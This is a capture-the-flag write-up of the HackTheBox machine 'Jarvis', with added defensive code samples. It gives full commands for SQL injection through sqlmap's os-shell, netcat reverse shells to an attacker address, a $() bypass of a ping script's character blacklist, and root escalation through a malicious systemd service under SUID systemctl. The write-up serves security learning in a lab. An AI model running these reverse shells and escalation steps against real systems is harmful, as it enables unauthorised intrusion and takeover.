HackTheBox - Jarvis


Jarvis was a nice 30 point box created by manulqwerty and Ghostpp7. It started out by finding SQL Injection in a vulnerable parameter and using sqlmap to get an os-shell, abusing a sudo script to get user and finally exploiting a SUID systemctl to get root.

User.txt

Nmap


We start the box with a quick TCP nmap scan:

# ports=$(nmap -sT -p- --min-rate=5000 --max-retries=2 10.10.10.143 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) && 
nmap -sV -sC -T4 -p$ports 10.10.10.143

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 03:f3:4e:22:36:3e:3b:81:30:79:ed:49:67:65:16:67 (RSA)
|   256 25:d8:08:a8:4d:6d:e8:d2:f8:43:4a:2c:20:c8:5a:f6 (ECDSA)
|_  256 77:d4:ae:1f:b0:be:15:1f:f8:cd:c8:15:3a:c3:69:e1 (ED25519)
80/tcp    open  http    Apache httpd 2.4.25 ((Debian))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Stark Hotel
64999/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


HTTP


Navigating to http://10.10.10.143/ we come across the following page:


Browsing around the site we come across the rooms available for booking:


Checking out one of the rooms and we get the following page:


We notice the URL has a parameter cod= that takes a number as input and points to a specific room. Adding a ' to the end of the URL, you’ll notice the following change in output:


Sqlmap --os-shell


After some simple enumeration with sqlmap we confirm the parameter is vulnerable to SQL Injection and use the --os-shell option to exploit it:

# sqlmap -u "http://10.10.10.143/room.php?cod=1" --os-shell
...
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4

what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /usr/local/apache2/htdocs, /var/www/nginx-default, /srv/www') (default) 
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 1

os-shell> id
command standard output: 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'

Now that we have command execution as www-data, we can simply send ourselves a netcat reverse shell from the os-shell prompt:

os-shell> nc 10.10.14.6 443 -e /bin/bash

─────────────────────────────────────────────────────────────────────────────────────────────────────────────
# nc -nlvp 443
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.143.
Ncat: Connection from 10.10.10.143:36332.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@jarvis:/var/www/html$


www-data to Pepper


Running sudo -l as www-data, we notice the following script can be run as pepper:

www-data@jarvis:/var/www/html$ sudo -l
Matching Defaults entries for www-data on jarvis:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on jarvis:
    (pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py

Checking out the script, we notice the following function executes the ping command and blacklists specific characters to ‘prevent’ command execution:

import os

def exec_ping():
    # Deny-list of characters the author considered sufficient to stop injection
    forbidden = ['&', ';', '-', '`', '||', '|']
    command = input('Enter an IP: ')
    for i in forbidden:
        if i in command:
            print('Got you')
            exit()
    # Reached only when no blacklisted token was found; the input still goes through a shell
    os.system('ping ' + command)

Unfortunately for pepper, this blacklist is missing some crucial characters, which we’re able to leverage in order to get command execution and subsequently a shell as pepper.
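As an added example (not the box's simpler.py), the original blacklist check sits beside an allow-list validator and a shell-free ping wrapper, so the gap can be tested directly: the $() substitution used later in this writeup passes the blacklist but is rejected by ipaddress.ip_address, and an argv list never hands the value to a shell. validate_ip and safe_ping are hypothetical names.

```python
import ipaddress
import subprocess
from typing import Optional

# The same deny-list as simpler.py on the box
FORBIDDEN = ['&', ';', '-', '`', '||', '|']


def blacklist_allows(command: str) -> bool:
    """Mirror the original check: True means the input would reach
    os.system('ping ' + command) unchanged."""
    return not any(token in command for token in FORBIDDEN)


def validate_ip(command: str) -> Optional[str]:
    """Allow-list instead of deny-list: accept only a literal IPv4/IPv6
    address and return its canonical form, None for anything else."""
    try:
        return str(ipaddress.ip_address(command.strip()))
    except ValueError:
        return None


def safe_ping(command: str, count: int = 1) -> int:
    """Hypothetical hardened replacement for exec_ping's os.system call.
    Returns ping's exit code, or -1 if the input was rejected before any
    process was started."""
    target = validate_ip(command)
    if target is None:
        return -1
    # argv list with no shell: the target is a single argument, so nothing
    # in it is ever parsed by /bin/sh, whatever the blacklist says.
    return subprocess.run(['ping', '-c', str(count), target],
                          stdout=subprocess.DEVNULL).returncode
```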


Pepper shell


We can use $() to bypass the blacklist and achieve command execution, as demonstrated below:

www-data@jarvis:/var/www/html$ sudo -u pepper /var/www/Admin-Utilities/simpler.py -p

***********************************************
     _                 _                       
 ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _ 
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | |  __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
                |_|               |_|    |___/ 
                                @ironhackers.es
                                
***********************************************

Enter an IP: $(whoami)
$(whoami)
ping: pepper: Temporary failure in name resolution

We can see here that pepper is returned, so we have command execution. To get a shell as pepper we can put a netcat command in a shell script and call that script the same way as our whoami command:

www-data@jarvis:/var/www/html$ echo 'nc 10.10.14.6 1234 -e /bin/bash' > /tmp/shell.sh
www-data@jarvis:/var/www/html$ sudo -u pepper /var/www/Admin-Utilities/simpler.py -p

***********************************************
     _                 _                       
 ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _ 
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | |  __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
                |_|               |_|    |___/ 
                                @ironhackers.es
                                
***********************************************

Enter an IP: $(bash /tmp/shell.sh)
$(bash /tmp/shell.sh)

─────────────────────────────────────────────────────────────────────────────────────────────────────────────
# nc -nlvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.143.
Ncat: Connection from 10.10.10.143:52160.
id
uid=1000(pepper) gid=1000(pepper) groups=1000(pepper)
python -c 'import pty; pty.spawn("/bin/bash")'
pepper@jarvis:/var/www/html$


Flag


With our shell as pepper we can simply cat the user flag.

pepper@jarvis:~$ cat user.txt
cat user.txt
2afa36...



Root.txt

SUID


During our usual Linux enumeration we notice that systemctl has the SUID bit set and find a reference to it on GTFOBins.

pepper@jarvis:~$ find / -perm -u=s -type f 2>/dev/null
/bin/systemctl


systemctl


systemctl allows us to control the systemd system and service manager.

systemctl may be used to introspect and control the state of the systemd system and service manager.

In order to exploit this we first need to create a malicious .service file structured like the following:

[Service]
ExecStart=/bin/bash /home/pepper/root.sh
[Install]
WantedBy=multi-user.target

We then echo it into our malicious .service file:

pepper@jarvis:~$ echo '[Service]
> ExecStart=/bin/bash /home/pepper/root.sh
> [Install]
> WantedBy=multi-user.target' >/home/pepper/root.service

Next we create a bash script containing a reverse shell; the service file will call it, so the reverse shell runs with root privileges:

pepper@jarvis:~$ echo 'nc 10.10.14.6 1337 -e /bin/bash' > /home/pepper/root.sh


Flag


All we need to do now is link and enable our malicious service file and we get root.

pepper@jarvis:~$ systemctl link /home/pepper/root.service
Created symlink /etc/systemd/system/root.service -> /home/pepper/root.service.

pepper@jarvis:~$ systemctl enable --now /home/pepper/root.service
Created symlink /etc/systemd/system/multi-user.target.wants/root.service -> /home/pepper/root.service.


─────────────────────────────────────────────────────────────────────────────────────────────────────────────
# nc -nvlp 1337
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.10.10.143.
Ncat: Connection from 10.10.10.143:59882.
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
d41d8c...
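From the defender's side, as an added example that is not part of the writeup: an auditor that walks systemd unit directories and flags units that resolve into a user-writable path, or whose ExecStart runs a script from one, which is the exact shape of the root.service link created above. build_demo_tree() constructs a temporary tree mirroring that link (constructed sample data); audit_unit, audit_dirs and WRITABLE_PREFIXES are hypothetical names.

```python
import re, tempfile
from pathlib import Path

# Locations a non-root user can normally write to; extend per host.
WRITABLE_PREFIXES = ('/home/', '/tmp/', '/var/tmp/', '/dev/shm/')
EXEC_RE = re.compile(r'^\s*Exec(?:Start|StartPre|StartPost|Stop)\s*=\s*(.*)$', re.M)


def audit_unit(unit, prefixes=WRITABLE_PREFIXES):
    """Return findings (strings) for one unit file or symlink in a unit directory."""
    findings = []
    real = unit.resolve()  # follows the symlink that 'systemctl link' creates
    if unit.is_symlink() and str(real).startswith(prefixes):
        findings.append(f'{unit} -> {real}: unit file lives in a user-writable path')
    try:
        text = real.read_text()
    except OSError:
        return findings
    for m in EXEC_RE.finditer(text):
        # Check every word: '/bin/bash /home/pepper/root.sh' is root's bash running a user script.
        for word in m.group(1).split():
            if word.startswith(prefixes):
                findings.append(f'{unit}: {m.group(0).strip()} executes {word}')
    return findings


def audit_dirs(dirs, prefixes=WRITABLE_PREFIXES):
    """Audit every *.service in the given unit directories (.wants dirs included)."""
    units = sorted(u for d in dirs if Path(d).is_dir() for u in Path(d).glob('*.service'))
    return [f for u in units for f in audit_unit(u, prefixes)]


def build_demo_tree():
    """Constructed sample: temp tree with the writeup's root.service link beside a
    benign unit. Returns (unit_dir, prefixes including the temp home directory)."""
    base = Path(tempfile.mkdtemp()).resolve()
    home, etc = base / 'home' / 'pepper', base / 'etc' / 'systemd' / 'system'
    for d in (home, etc):
        d.mkdir(parents=True)
    (home / 'root.service').write_text('[Service]\nExecStart=/bin/bash /home/pepper/root.sh\n'
                                       '[Install]\nWantedBy=multi-user.target\n')
    (etc / 'root.service').symlink_to(home / 'root.service')
    (etc / 'sshd.service').write_text('[Service]\nExecStart=/usr/sbin/sshd -D\n')
    return str(etc), (f'{home}/',) + WRITABLE_PREFIXES


if __name__ == '__main__':
    demo_dir, demo_prefixes = build_demo_tree()
    print('\n'.join(audit_dirs([demo_dir], demo_prefixes)) or 'no findings')
```

On a live host, point audit_dirs at /etc/systemd/system and its multi-user.target.wants directory with the default prefixes; both symlinks that systemctl created above would be reported.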